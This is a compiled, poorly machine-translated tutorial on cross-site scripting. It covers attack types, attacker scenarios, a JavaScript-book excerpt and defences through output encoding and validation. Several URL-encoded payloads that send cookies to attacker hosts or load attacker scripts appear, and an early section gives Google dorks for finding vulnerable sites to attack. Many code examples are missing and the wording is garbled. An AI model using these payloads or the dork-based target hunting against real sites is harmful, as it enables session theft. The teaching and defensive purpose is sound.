What is xss vulnerability. Using XSS vulnerabilities to the maximum. Examples of XSS vulnerabilities
Cross-site scripting (XSS) is a vulnerability that involves the injection of client-side code (JavaScript) into a web page that other users are viewing.
The vulnerability arises from insufficient filtering of data that a user submits for insertion into a web page. It is much easier to understand with a specific example. Think of any guestbook - these are programs that are designed to accept data from the user and then display it. Let's imagine that the guestbook does not check or filter the input data in any way, but simply displays it.
You can sketch your simplest script (there is nothing easier than writing bad scripts in PHP - a lot of people do this). But there are already plenty of ready-made options. For example, I suggest getting started with Dojo and the OWASP Mutillidae II. There is a similar example there. In standalone Dojo, go to your browser at: http: //localhost/mutillidae/index.php? Page = add-to-your-blog.php
If one of the users entered:
Then the web page will display:
Hey! I like your site.
And if the user enters like this:
Hey! I like your site.
Then it will be displayed like this:
Browsers store many cookies on a large number of sites. Each site can only receive cookies saved by itself. For example, example.com has stored some cookies in your browser. If you visit another.com site, this site (client and server scripts) cannot access the cookies stored by example.com.
If the site example.com is vulnerable to XSS, then this means that we can in one way or another inject JavaScript code into it, and this code will be executed on behalf of the site example.com! Those. this code will, for example, gain access to the cookies of the site example.com.
I think everyone remembers that JavaScript is executed in the user's browsers, i.e. in the presence of XSS, the injected malicious code gains access to the data of the user who opened the website page.
The injected code can do everything that JavaScript can, namely:
- accesses the cookies of the site you are viewing
- can make any changes to the appearance of the page
- accesses the clipboard
- can inject JavaScript programs, for example, key loggers (interceptors of pressed keys)
- hook on BeEF
- and etc.
Simplest cookie example:
Actually, alert used only for XSS detection. The real malicious payload performs covert actions. It secretly communicates with the attacker's remote server and transfers the stolen data to it.
XSS views
The most important thing to understand about the types of XSS is that they are:
- Stored (Persistent)
- Reflected (Impermanent)
An example of constants:
- A specially crafted guestbook message (comment, forum message, profile) entered by an attacker and saved on the server is downloaded from the server every time users request to display this page.
- An attacker gained access to server data, for example, through SQL injection, and injected malicious JavaScript code (with keyloggers or with BeEF) into the data displayed to the user.
An example of volatile:
- There is a search on the site, which, along with the search results, shows something like "You searched for: [search string]", while the data is not filtered properly. Since such a page is displayed only for those who have a link to it, the attack will not work until the attacker sends the link to other users of the site. Instead of sending a link to the victim, you can use the placement of a malicious script on a neutral site visited by the victim.
They also distinguish (some as a kind of volatile XSS vulnerabilities, some say that this kind can also be a kind of persistent XSS):
- DOM models
Features of DOM-based XSS
To put it quite simply, we can see the malicious code of "regular" volatile XSS if we open the HTML code. For example, a link is formed like this:
Http://example.com/search.php?q= "/>
And when we open the source HTML code, we see something like this:
And DOM XSS change the DOM structure, which is formed in the browser on the fly, and we can see the malicious code only when we view the formed DOM structure. This does not change the HTML. Let's take the following code as an example:
Then in the browser we will see:
Source code of the page:
Let's form the address as follows:
Http: //localhost/tests/XSS/dom_xss.html#input=tokenAlex;
The page now looks like this:
But let's take a look at the HTML source:
Nothing has changed there. This is what I said, we need to look at the DOM structure of the document in order to identify malicious code:
Here is a working prototype of XSS, for a real attack we need a more complex payload, which is impossible due to the fact that the application stops reading immediately after the semicolon, and something like alert (1); alert (2) is no longer possible. However, thanks to unescape () in the returned data, we can use a payload like this:
Http: //localhost/tests/XSS/dom_xss.html#input=tokenAlex;
Where did we replace the symbol ; to the URI encoded equivalent!
We can now write a malicious JavaScript payload and compose a link to send to the victim, as is done for standard non-persistent cross-site scripting.
XSS Auditor
In Google Chrome (and also in Opera, which now uses the Google Chrome engine), I was in for a surprise like this:
dom_xss.html: 30 The XSS Auditor refused to execute a script in "http: //localhost/tests/XSS/dom_xss.html#input=token ‹script› alert (1); "because its source code was found within the request. The auditor was enabled as the server sent neither an" X-XSS-Protection "nor" Content-Security-Policy "header.
Those. there is now an XSS auditor in the browser that will try to prevent XSS. Firefox doesn't have this functionality yet, but I guess it's a matter of time. If the implementation in browsers is successful, then we can talk about a significant difficulty in using XSS.
It's helpful to remember that modern browsers are taking steps to limit exploitation of issues like volatile XSS and DOM-based XSS. This also needs to be remembered when testing websites using a browser - it may well turn out that the web application is vulnerable, but you do not see the confirmation pop-up just because the browser is blocking it.
Examples of XSS exploitation
Attackers intending to exploit cross-site scripting vulnerabilities must approach each vulnerability class differently. Attack vectors for each class are described here.
With XSS vulnerabilities, attacks can use BeEF, which extends the attack from the website to the local user environment.
An example of a volatile XSS attack
1. Alice frequently visits a certain website that Bob hosts. Bob's website allows Alice to log in with a username / password and save sensitive data such as payment information. When a user logs in, the browser saves authorization cookies, which look like meaningless characters, i.e. both computers (client and server) remember that she was logged in.
2. Malory notes that Bob's website contains a volatile XSS vulnerability:
2.1 When visiting the search page, she enter the search string and clicks on the submit button, if no results are found, the page displays the entered search string, followed by the words "not found" and the url looks like http://bobssite.org?q= her search query
2.2 With a normal search term like “ doggies"The page just displays" doggies not found "and url http://bobssite.org?q= doggies, which is normal behavior.
2.3 However, when an abnormal search query is sent to a search like :
2.3.1 A warning message appears (which says "xss").
2.3.2 The page displays not found along with an error message with the text "xss".
2.3.3 usable url http://bobssite.org?q=
3. Mallory constructs a URL to exploit the vulnerability:
3.1 She makes the URL http://bobssite.org?q=puppies ... She can choose to convert ASCII characters to hexadecimal format such as http://bobssite.org?q=puppies%3Cscript%2520src%3D%22http%3A%2F%2Fmallorysevilsite.com%2Fauthstealer.js%22%3E to prevent people from immediately decrypting the malicious URL.
3.2 She sends an e-mail to some unsuspecting member of Bob's site saying, "Check out the cool dogs."
4. Alice receives a letter. She loves dogs and clicks on the link. She goes to Bob's site in a search, she doesn't find anything, it displays "no dogs found", and in the middle of it, a tag with a script is launched (it is invisible on the screen), loads and executes Mallory's authstealer.js program (triggering an XSS attack). Alice forgets about it.
5. The authstealer.js program runs in Alice's browser as if it originated from Bob's website. She grabs a copy of Alice's authorization cookies and sends them to Malorie's server, where Malorie retrieves them.
7. Now that Malorie is inside, she goes to the payment section of the website, looks up and steals a copy of Alice's credit card number. Then she goes and changes the password, i.e. now Alice can't even go in anymore.
8. She decides to take the next step and sends the link constructed in this way to Bob himself, and thus gets the administrative privileges of Bob's site.
Permanent XSS attack
- Malorie has an account on Bob's website.
- Malorie notices that Bob's website contains a persistent XSS vulnerability. If you go to a new section, post a comment, then it displays whatever is typed into it. But if the comment text contains HTML tags, those tags will be displayed as they are, and any script tags are run.
- Malorie reads the article in the News section and writes a comment in the Comments section. She inserts the text into the comment:
- In this story, I liked the dogs so much. They are so nice!
- When Alice (or anyone else) loads the page with this comment, Malory's script tag is triggered and steals Alice's authorization cookies, sends it to Malorie's secret server for collection.
- Malorie can now intercept Alice's session and impersonate Alice.
Find sites vulnerable to XSS
XSS roads
The first step is to select the sites on which we will perform XSS attacks. Websites can be searched using Google Dorks. Here are a few of these dorks, which you can copy and paste into Google Search:
- inurl: search.php? q =
- inurl: .php? q =
- inurl: search.php
- inurl: .php? search =
A list of sites will open before us. You need to open a site and find input fields on it, such as a feedback form, an input form, site search, etc.
I note right away that it is almost useless to search for vulnerabilities in popular automatically updated web applications. A classic example of such an application is WordPress. In fact, there are vulnerabilities in WordPress, and especially in its plugins. Moreover, there are many sites that do not update either the WordPress engine (due to the fact that the webmaster has made some of his own changes to the source code), nor plugins and themes (as a rule, these are pirated plugins and themes). But if you are reading this section and learn something new from it, then WordPress is not for you yet ... We will definitely come back to it later.
The best targets are a variety of custom engines and scripts.
You can choose as the insert payload
Pay attention to which HTML tags your injected code falls into. Here is an example of a typical input field ( input):
Our payload will go where the word "pillowcase" is now. Those. turn into tag value input... We can avoid this by closing the double quote and then the tag itself with "/>
"/>
Let's try it for a website:
Excellent, vulnerability exists
Programs for finding and scanning XSS vulnerabilities
Probably all web application scanners have a built-in XSS vulnerability scanner. This topic is not comprehensive, it is better to get acquainted with each such scanner separately.
Cross-Site Scripting or XSS. Cross-site scripting (cross-site scripting).
The Cross-site Scripting vulnerability allows an attacker to transmit executable code to the server, which will be redirected to the user's browser. This code is usually written in HTML / JavaScript, but VBScript, ActiveX, Java, Flash, or other browser-supported technologies can be used.
The submitted code is executed in the security context (or security zone) of the vulnerable server. By using these privileges, the code is able to read, modify, or transmit sensitive data accessible through the browser. The attacked user may have an account compromised (cookie theft), his browser may be redirected to another server, or the server content may be spoofed. As a result of a carefully planned attack, an attacker can use the victim's browser to view the site pages on behalf of the attacked user. The code can be transmitted by an attacker in the URL, in the headers Methods and structure of the HTTP request protocol (Cookie, user-agent, refferer), in the values of form fields, etc.
There are three types of cross-site scripting attacks: non-persistent non-persistent(reflected), persistent persistent(saved) and DOM based. The main difference between persistent and non-persistent is that in the reflected version, the transfer of the code to the server and its return to the client is carried out within one HTTP request, and in the stored one - in different ones.
Implementing a non-persistent attack requires the user to follow the link generated by the attacker (the link can be sent by email, ICQ, etc.). During the loading of the site, the code embedded in the URL or request headers will be transmitted to the client and executed in his browser.
A persistent vulnerability occurs when code is transmitted to a server and stored there for a period of time. The most popular targets in this case are forums, Web-based mail, and chat rooms. For an attack, the user does not need to follow the link; it is enough to visit the vulnerable site.
Example. Persistent attack. Many sites have message boards and forums that allow users to post. A registered user is usually identified by a number
session stored in a cookie. If an attacker leaves a message containing JavaScript code, he will gain access to the user's session ID. Sample code for passing cookies:
Example. Reflected (non-persistent) variant of the attack. Many servers provide users with the ability to search the contents of the server. Typically, the request is passed in a URL and contained in the resulting page.
For example, when clicking on the URL http: //portal.example/search? Q = ”fresh beer”, the user will be shown a page containing the search results and the phrase: “0 pages were found for your request for fresh beer”. If Javascript is passed as the search phrase, it will be executed in the user's browser. Example:
Http: //portal.example/search/? Q =
URLEncode encoding can be used to hide the script code
Http: //portal.example/index.php? Sessionid = 12312312 & username =% 3C% 73% 63% 72% 69% 70% 74% 3E% 64% 6F% 63% 75% 6D% 65% 6E% 74% 2E% 6C% 6F% 63% 61% 74% 69% 6F% 6E% 3D% 27% 68% 74% 74% 70% 3A% 2F% 2F% 61% 74% 74% 61% 63% 6B% 65% 72% 68% 6F% 73% 74% 2E% 65% 78% 61% 6D% 70% 6C% 65% 2F% 63% 67% 69% 2D% 62% 69% 6E% 2F% 63% 6F% 6F% 6B% 69% 65% 73% 74% 65% 61% 6C% 2E% 63% 67% 69% 3F% 27% 2B% 64% 6F% 63% 75% 6D% 65% 6E% 74% 2E% 63% 6F% 6F% 6B% 69% 65% 3C% 2F% 73% 63% 72% 69% 70% 74% 3E
Flanagan David JavaScript
Excerpted from Flanagan's book David JavaScript The Complete Guide 5th Edition.
The term cross "site scripting, or XSS, refers to a computer vulnerability where an attacker injects HTML tags or scripts into documents on a vulnerable website. It is common for web developers to write server-side scripts to defend against XSS attacks. Developing client-side JavaScript scripts should also be aware of XSS attacks and take protective measures against them.
A web page is considered vulnerable to XSS attacks if it dynamically generates document content based on user data that has not been preprocessed to remove inline HTML code. As a trivial example, consider the following web page that uses JavaScript to greet a user by name:
The second line of the script calls the window.location.search.substring method to retrieve the portion of the address bar that begins with the? Character. The dynamically generated document content is then added using the document.write () method. This scenario assumes that the web page will be accessed using a URL similar to this:
Http://www.example.com/greet.html?name=David
In this case, the text "Hi David" will be displayed. But what happens if the page is requested using the following URL:
Http://www.example.com/greet.html?name=%3Cscript%3Ealert("David")%3C/script%3E
With this URL content, the script will dynamically generate another script (the codes% 3C and% 3E are angle brackets)! In this case, the inserted script will simply display a dialog box that poses no danger. But imagine this case:
Http: //siteA/greet.html? Name =% 3Cscript src = siteB / evil.js% 3E% 3C / script% 3E
Cross-site scripting is called so because more than one site is involved in the attack. Site B (or even Site C) includes a specially crafted link (like the one just shown) to Site A, which contains a script from Site B. The evil.js script is hosted on attacker's site B, but now this script is being embedded in Site A and can do whatever he pleases with the content of site A. He can erase the page or cause other disruption to the site (for example, denial of service, which is discussed in the next section). This could adversely affect visitors to site A. It is much more dangerous that such a malicious script could read the content of the cookies stored on site A (possibly containing account numbers or other personal information) and send that data back to site B. The embedded script may even be tracked keystrokes and send that data to site B.
A generic way to prevent XSS attacks is to remove HTML tags from all data of questionable origin before using them to dynamically generate document content. To fix this issue in the previously shown greet.html file, add the following line to the script to remove the angle brackets that surround the tag". Any user who visits the page will now receive the following response:
Last comment:
When the user's browser loads the page, it will execute everything, including the JavaScript contained within the tags ... This indicates that the mere presence of a script injected by an attacker is a problem, regardless of what particular script code is actually being executed.
Part two: XSS attack
XSS attack participants
Before describing in detail how an XSS attack works, we need to identify the actors involved in the XSS attack. In general, there are three participants in an XSS attack: Web site, victim, and cracker.
- Web site produces HTML pages for users who request them. In our examples, it is located at http: // website /.
- Website database is a database that stores some of the data entered by users on the pages of the site.
- Victim Is a regular website user who requests pages from him using his browser.
- Attacking Is an attacker who intends to launch an attack on the victim by exploiting an XSS vulnerability on the site.
- Cracker server Is a web server under the control of an attacker with the sole purpose of stealing the victim's confidential information. In our examples, it is located at http: // attacker /.
Example attack scenario
This script will create an HTTP request to a different URL that will redirect the user's browser to the attacker's server. The URL includes the victim's cookies as a request parameter, when an HTTP request arrives at the attacker's server, the attacker can extract these cookies from the request. After the attacker has received the cookies, he can use them to impersonate the victim and launch a subsequent attack.
From now on, the above HTML code will be called malicious string or malicious script... It is important to understand that the string itself is only malicious if it is ultimately processed as HTML in the victim's browser, which can only happen if there is an XSS vulnerability in the website.
How this example attack works
The diagram below shows an example of an attacker performing an attack:
- The attacker uses one of the website's forms to insert a malicious string into the website's database.
- The victim requests a page from a website.
- The site includes a malicious string from the database in the response and sends it to the victim.
- The victim's browser runs the malicious script inside the response, sending the victim's cookie to the attacker's server.
XSS types
The target of an XSS attack is always to execute a malicious JavaScript script in the victim's browser. There are several fundamentally different ways to achieve this goal. XSS attacks are often categorized into three types:
- Stored (persistent) XSS where the malicious string originates from the website's database.
- Reflected (volatile) XSS where the malicious string is spawned from the victim's request.
- DOMs XSS where the vulnerability occurs in the client-side code rather than the server-side code.
The previous example shows a stored XSS attack. We will now describe two other types of XSS attacks: Reflected XSS and DOM XSS.
Reflected XSS
In a reflected XSS attack, the malicious string is part of the victim's request to the website. The site accepts and inserts this malicious string into the response it sends back to the user. The diagram below illustrates this scenario:
- The victim is tricked by the attacker to send a URL request to the website.
- The site includes a malicious string from the request URL in the victim's response.
- The victim's browser executes the malicious script contained in the response, sending the victim's cookie to the attacker's server.
How to successfully defend against XSS attacks?
A reflected XSS attack may seem harmless, as it requires the victim to send a request on their behalf containing a malicious string. Since no one will voluntarily attack themselves, there seems to be no way to actually carry out the attack.
As it turns out, there are at least two common ways to get the victim to launch a reflected XSS attack against themselves:
- If the user is a specific person, the attacker can send a malicious URL to the victim (for example, via email or instant messenger) and trick them into opening the link to visit the website.
- If the target is a large group of users, an attacker could post a link to a malicious URL (for example, on his own website or on a social network) and wait for visitors to click on the link.
Both of these methods are similar, and both can be more successful by using URL shortening services to mask the malicious string from users who might identify it.
XSS in the DOM
DOM XSS is a variant of both a stored and reflected XSS attack. In this XSS attack, the malicious string is not processed by the victim's browser until the actual JavaScript of the website is executed. The diagram below illustrates this scenario for a reflected XSS attack:
- The attacker creates a URL containing a malicious string and sends it to the victim.
- The victim is tricked by the attacker to send a URL request to the website.
- The site accepts the request, but does not include the malicious string in the response.
- The victim's browser executes the legitimate script contained in the response, as a result of which the malicious script will be inserted into the page.
- The victim's browser executes the malicious script inserted into the page, sending the victim's cookie to the attacker's server.
What is the difference between XSS in the DOM?
In the previous examples of stored and reflected XSS attacks, the server injects malicious script into the page, which is then forwarded in response to the victim. When the victim's browser receives a response, it assumes that the malicious script is part of the legitimate content of the page, and automatically executes it at page load time, just like any other script.
In the DOM XSS attack example, the malicious script is not inserted as part of the page; the only script that is automatically executed during page load is the legitimate part of the page. The problem is that this legitimate script directly uses user input to add HTML to the page. Since the malicious string is inserted into the page using innerHTML, it is parsed as HTML, causing the malicious script to execute.
This distinction is small, but very important:
- In traditional XSS, malicious JavaScript is executed on page load, as part of the HTML sent by the server.
- In the case of XSS in the DOM, the malicious JavaScript is executed after the page is loaded, causing that legitimate JavaScript page to access user input (containing the malicious string) in an unsafe manner.
How does XSS work in the DOM?
In the previous example, JavaScript is not required; the server can generate all the HTML by itself. If the server-side code were free of vulnerabilities, the website would not be vulnerable to the XSS vulnerability.
However, as web applications become more advanced, more and more HTML pages are generated using JavaScript on the client side rather than on the server. At any time, the content must change without refreshing the entire page, this is possible using JavaScript. In particular, this is the case when the page is refreshed after an AJAX request.
This means that XSS vulnerabilities can be present not only in the server side of your site's code, but also on the JavaScript side of your site's client code. Therefore, even with completely safe server-side code, client code may still not be safe to include user input when the DOM is updated after the page has loaded. If this happens, then the client-side code will allow an XSS attack through no fault of the server-side code.
DOM-based XSS may not be visible to the server
There is a special case of a DOM XSS attack in which the malicious string is never sent to the website server: this happens when the malicious string is contained in a portion of the URL's identifier (anything after the # character). Browsers do not send this portion of the URL to the server, so the website cannot be accessed by server side code. The client-side code, however, has access to it, and thus it is possible to conduct an XSS attack through insecure processing.
This case is not limited to the fragment identifier. There is other user input that is invisible to the server, such as new HTML5 features like LocalStorage and IndexedDB.
Part three:
Preventing XSS
XSS Prevention Techniques
As a reminder, XSS is a code injection attack: user input is mistakenly interpreted as malicious code. Safe handling of input is required to prevent this type of code injection. For a web developer, there are two fundamentally different ways to perform secure input processing:
- Coding is a way that allows the user to enter data only as data and does not allow the browser to be processed as code.
- Validation is a way to filter user input so that the browser interprets it as code without malicious commands.
While these are fundamentally different methods of XSS prevention, they have several things in common that are important to understand when using any of them:
Context Safe handling of input needs to be done differently depending on where the user input is used on the page. inbound / outbound Secure input processing can be performed either when your site receives input (inbound traffic) or right before the site inserts user input into the page content (outbound). Client / Server Secure input processing can be done either on the client side or on the server side, each of which is needed under different circumstances.
Before explaining in detail how coding and validation works, we describe each of these points.
Handling User Input in Contexts
There are many contexts on a web page where user input can be applied. For each of them, special rules must be followed so that user input cannot "escape" from its context and cannot be interpreted as malicious code. The following are the most common contexts:
How important are contexts?
In all of the described contexts, an XSS vulnerability can arise if user input was inserted prior to the first encoding or validation. An attacker can inject malicious code simply by inserting a closing separator for this context followed by malicious code.
For example, if at some point a website includes user input directly into an HTML attribute, an attacker could inject malicious script by starting their input with a quotation mark, as shown below:
This could have been prevented by simply removing all quotes in the user input and it would be fine, but only in this context. If the input was inserted into a different context, the closing delimiter will be different and injection will be possible. For this reason, safe handling of input must always be adapted to the context where user input will be inserted.
Handling incoming / outgoing user input
Instinctively, it might seem like XSS can be prevented by encoding or validating all user input as soon as our site receives it. This way, any malicious strings will already be neutralized whenever they are included in the page, and HTML generation scripts will not have to worry about safely handling user input.
The problem is that, as described earlier, user input can be inserted into multiple contexts on the page. And there is no easy way to determine when user input comes into context - how it will eventually be inserted, and the same user input often needs to be inserted in different contexts. By relying on handling incoming input to prevent XSS, we create a very fragile solution that will be error prone. (The legacy PHP magic quotes are an example of such a solution.)
Instead, handling outbound input should be your main line of defense against XSS, because it can take into account the specific context of what user input will be inserted. To some extent, inbound validation can be used to add a secondary layer of protection, but more on that later.
Where it is possible to safely handle user input
In most modern web applications, user input is handled both on the server-side code and on the client-side code. In order to protect against all types of XSS, secure input processing must be done in both server-side code and client-side code.
- In order to protect against traditional XSS, secure input handling must be done in server-side code. This is done using some language supported by the server.
- To protect against an XSS attack in the DOM, where the server never receives a malicious string (such as the ID fragment attack described earlier), secure input handling must be done in client-side code. This is done using JavaScript.
Now that we have explained why context matters, why the distinction between inbound and outbound input processing is important, and why safe input processing must be done on both the client and server sides, we can go on to explain. how the two types of secure input handling (encoding and validation) are actually performed.
Coding
Encoding is a way out of a situation where it is necessary that the browser interprets user input only as data, not code. The most popular type of coding in web development is HTML masking, which converts characters such as < and > in < and > respectively.
The following pseudocode is an example of how user input (user input) can be encoded using HTML masking and then inserted into a page using server-side script:
print " "
print "Last comment:"
print encodeHtml (userInput)
print ""
If the user enters the following line, the resulting HTML will look like this:
Last comment:
Because all characters with a special meaning have been masked, the browser will not parse any part of the user input like HTML.
Client and server side coding
When executing client-side coding, JavaScript is always used, which has built-in functions that encode data for different contexts.
When doing coding in your server-side code, you rely on the functions available in your language or framework. Due to the large number of languages and frameworks available, this tutorial will not cover the details of coding in any particular server or framework language. However, client-side JavaScript encoding features are also used when writing server-side code.
Client side coding
When coding client-side user input with JavaScript, there are several built-in methods and properties that automatically encode all data into a context sensitive style:
The last context already mentioned above (values in JavaScript) is not included in this list because JavaScript does not provide a built-in way to encode data that would be included in the JavaScript source code.
Encoding limitations
Even when coding, it is possible to use malicious strings in some contexts. A prime example of this is when user input is used to provide a URL, like in the example below:
document.querySelector ("a"). href = userInput
Although the specified value in the property of the href element automatically encodes it so that it becomes nothing more than the value of the attribute, this in itself does not prevent an attacker from inserting a URL that begins with "javascript:". When the link is clicked, regardless of construction, the embedded JavaScript inside the URL will be executed.
Coding is also not an efficient solution when you want users to be able to use some of the HTML codes on the page. An example would be a user profile page where a user can use custom HTML. If this plain HTML is encoded, the profile page can only consist of plain text.
In situations like this, the coding must be complemented by validation, which we'll get to know next.
Validation
Validation is the act of filtering user input so that all malicious parts of it are removed without having to remove all of the code in it. One of the most used types of validation in web development allows you to use some HTML elements (for example, and ) but prohibiting others (e.g.